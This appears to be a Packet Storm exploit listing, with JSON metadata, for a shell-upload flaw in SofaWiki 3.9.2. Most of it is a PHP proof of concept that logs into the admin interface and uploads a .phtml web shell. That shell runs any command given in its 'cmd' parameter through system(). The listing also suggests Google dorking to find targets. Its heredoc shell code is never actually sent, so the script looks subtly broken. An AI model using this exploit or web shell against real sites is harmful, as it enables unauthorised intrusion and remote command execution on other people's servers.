📄 SofaWiki 3.9.2 Shell Upload_PACKETSTORM:215891

Description

This is a proof of concept remote shell upload exploit for SofaWiki version 3.9.2 that leverages an issue originally discovered in 2024...

Visit Original Source

Basic Information

ID PACKETSTORM:215891

Published Feb 19, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : SofaWiki 3.9.2 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.sofawiki.com/site/files/snapshot.zip |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

(Related : https://packetstorm.news/files/id/178203/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: script.php <base_url> <username> <password>

[+] PayLoad :

<?php
if ($argc < 4) {
echo "Usage: php exploit.php <base_url> <username> <password>\n";
exit(1);
}

$base_url = $argv[1];
$username = $argv[2];
$password = $argv[3];

$filename = rand(10000, 99999) . ".phtml";

$ch = curl_init();

$login_url = $base_url . "/index.php";
$login_data = [
"submitlogin" => "Login",
"username" => $username,
"pass" => $password,
"name" => "SofaWiki",
"action" => "login"
];

echo "Exploiting...\n";
sleep(1);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

if (strpos($response, "Logout") === false) {
echo "Login failed: " . $response . "\n";
exit();
}

echo "Login Successful\n";
sleep(1);

$php_shell_code = <<<EOT
<html>
<body>
<form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset(\$_GET['cmd']))
{
system(\$_GET['cmd']);
}
?>
</pre>
</body>
</html>
EOT;

echo "Shell uploading...\n";
sleep(1);

$upload_url = $base_url . "/index.php";
$files = [
"uploadedfile" => new CURLFile(tempnam(sys_get_temp_dir(), 'php'), "text/php", $filename),
"action" => "uploadfile",
"MAX_FILE_SIZE" => "8000000",
"filename" => $filename,
"content" => "content"
];

curl_setopt($ch, CURLOPT_URL, $upload_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $files);
$response = curl_exec($ch);

if ($response) {
echo "Your shell is ready: {$base_url}/site/files/{$filename}\n";
} else {
echo "Upload failed: " . $response . "\n";
}

curl_close($ch);
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-19T16:28:41",
    "description": "This is a proof of concept remote shell upload exploit for SofaWiki version 3.9.2 that leverages an issue originally discovered in 2024...",
    "published": "2026-02-19T00:00:00",
    "modified": "2026-02-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 SofaWiki 3.9.2 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215891",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : SofaWiki 3.9.2 shell upload Vulnerability                                                                                   |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://www.sofawiki.com/site/files/snapshot.zip                                                                            |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.\n    \n       (Related : https://packetstorm.news/files/id/178203/ Related CVE numbers:  ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Usage: script.php <base_url> <username> <password>\n    \n    [+] PayLoad :\n    \n    <?php\n    if ($argc < 4) {\n        echo \"Usage: php exploit.php <base_url> <username> <password>\\n\";\n        exit(1);\n    }\n    \n    $base_url = $argv[1];\n    $username = $argv[2];\n    $password = $argv[3];\n    \n    $filename = rand(10000, 99999) . \".phtml\";\n    \n    $ch = curl_init();\n    \n    $login_url = $base_url . \"/index.php\";\n    $login_data = [\n        \"submitlogin\" => \"Login\",\n        \"username\" => $username,\n        \"pass\" => $password,\n        \"name\" => \"SofaWiki\",\n        \"action\" => \"login\"\n    ];\n    \n    echo \"Exploiting...\\n\";\n    sleep(1);\n    \n    curl_setopt($ch, CURLOPT_URL, $login_url);\n    curl_setopt($ch, CURLOPT_POST, true);\n    curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n    $response = curl_exec($ch);\n    \n    if (strpos($response, \"Logout\") === false) {\n        echo \"Login failed: \" . $response . \"\\n\";\n        exit();\n    }\n    \n    echo \"Login Successful\\n\";\n    sleep(1);\n    \n    $php_shell_code = <<<EOT\n    <html>\n    <body>\n    <form method=\"GET\" name=\"<?php echo basename(\\$_SERVER['PHP_SELF']); ?>\">\n    <input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n    <input type=\"SUBMIT\" value=\"Execute\">\n    </form>\n    <pre>\n    <?php\n    if(isset(\\$_GET['cmd']))\n    {\n        system(\\$_GET['cmd']);\n    }\n    ?>\n    </pre>\n    </body>\n    </html>\n    EOT;\n    \n    echo \"Shell uploading...\\n\";\n    sleep(1);\n    \n    $upload_url = $base_url . \"/index.php\";\n    $files = [\n        \"uploadedfile\" => new CURLFile(tempnam(sys_get_temp_dir(), 'php'), \"text/php\", $filename),\n        \"action\" => \"uploadfile\",\n        \"MAX_FILE_SIZE\" => \"8000000\",\n        \"filename\" => $filename,\n        \"content\" => \"content\"\n    ];\n    \n    curl_setopt($ch, CURLOPT_URL, $upload_url);\n    curl_setopt($ch, CURLOPT_POSTFIELDS, $files);\n    $response = curl_exec($ch);\n    \n    if ($response) {\n        echo \"Your shell is ready: {$base_url}/site/files/{$filename}\\n\";\n    } else {\n        echo \"Upload failed: \" . $response . \"\\n\";\n    }\n    \n    curl_close($ch);\n    ?>\n    \n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215891",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215891/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply